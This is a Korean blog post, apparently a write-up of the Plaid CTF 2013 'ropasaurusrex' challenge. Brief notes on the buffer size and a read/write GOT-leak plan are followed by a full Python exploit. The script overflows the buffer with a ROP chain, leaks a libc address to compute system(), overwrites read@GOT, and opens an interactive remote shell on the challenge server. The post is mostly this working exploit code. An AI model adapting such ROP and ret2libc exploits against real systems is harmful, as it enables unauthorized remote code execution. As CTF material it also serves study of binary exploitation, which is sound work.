-
Plaid CTF 2013 ropasaurusrexHack/Pwnable 2015. 9. 15. 06:09
libc.so.6-f85c96c8fc753bfa75140c39501b4cd50779f43abuf는 136바이트이다.
buf + sfp하면 140바이트이다.
read는 256바이트를 읽기때문에 충분히 페이로드 작성이 가능하다.
libc에서 필요한것은 readelf -s 로 알아내면된다.
1. print read_got
2. read read_got
3. read_plt /bin/sh
from socket import * import time,struct p = lambda x: struct.pack("<L",x) up = lambda x: struct.unpack("<L",x) HOST = "server.stria.me" PORT = 12345 s = socket(AF_INET,SOCK_STREAM) s.connect((HOST,PORT)) libc_system = 0x00039450 ppppr = 0x080484B5 pppr = 0x080484B6 write_got = 0x8049614 write_plt = 0x0804830C read_got = 0x804961C read_plt = 0x0804832C bss = 0x08049628 binsh = "/bin/sh" address = 0x9aa40 payload = "\x90"*140 payload += p(read_plt) payload += p(pppr) payload += p(1) payload += p(bss) payload += p(8) payload += p(write_plt) payload += p(pppr) payload += p(1) payload += p(read_got) payload += p(4) payload += p(read_plt) payload += p(pppr) payload += p(1) payload += p(read_got) payload += p(4) payload += p(read_plt) payload += p(0x12345678) payload += p(bss) s.send(payload + "\n") s.send(binsh + "\n") recv = s.recv(4) addr = up(recv[0:4])[0] print hex(addr) system_plt = addr - address print hex(system_plt) s.send(p(system_plt) + "\n") time.sleep(0.5) while True: cmd = raw_input("$") s.send(cmd + "\n") print s.recv(1024) s.close()
'Hack > Pwnable' 카테고리의 다른 글
RTL(Return To Libc) (0) 2015.09.27 HackCat 3rd gottheflag (0) 2015.09.25 Got Overwrite Using puts@got (0) 2015.09.15 gdb 1줄로 사용하기 (0) 2015.09.02 Parallels LPE Vulnarability (0) 2015.08.30
